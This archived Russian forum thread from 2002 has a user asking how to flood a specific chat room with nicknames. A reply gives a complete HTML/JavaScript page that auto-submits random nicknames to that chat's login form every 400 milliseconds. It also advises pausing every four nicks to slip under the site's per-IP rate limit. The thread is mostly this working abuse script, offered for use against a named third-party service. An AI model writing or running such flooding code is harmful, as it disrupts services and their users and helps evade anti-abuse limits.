Просмотр полной версии : Помогите сделать флуд в чате!) Пжалуйсто! )
Люди человеки!http://forum.antichat.ru/iB_html/non-cgi/emoticons/wink.gif)) Помогите плиз))) Расскажите как сделать флуд из ников в чате http://www.6684.chatcity.ru/ я попытался но не вышло((( Буду надеяться вы поможете)) Заранее спасибо)
Dj Skeleton™
24.08.2002, 18:58
всё элементарно:
<HTML>
<HEAD>
<TITLE>.::chAT FlooDeR::.</TITLE>
< script>
function flood() {
this.document.chat.mn.value=(Math.floor(Math.rando m()*1000000))
this.document.chat.submit()
}
setInterval ("flood()", 400)
</script>
</HEAD>
<BODY bgColor=#000066 onload="flood()">
<form method=get action="http://www.6684.chatcity.ru/kpobatka" name="chat" target="new">
<input class="fdown" name="mn" value="nick_there" size=15 maxlength=32>
<input type=hidden name="rnd" value="1011522582">
<input class="fdown" type="image" value="Войти">
<input class="fdown" type=button value="Выход" onClick="top.location='http://www.6684.chatcity.ru/kpobatka?f=101&c=6684'">
<input type="hidden" name="c" value="6684"><input type="hidden" name="f" value="11">
</form>
</BODY></HTML>
ЗЫ: тока учти, что через каждые четыре ника придётся делать паузу, т.к. там стоит ограничение на количество запросов с одного ip в минуту!
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot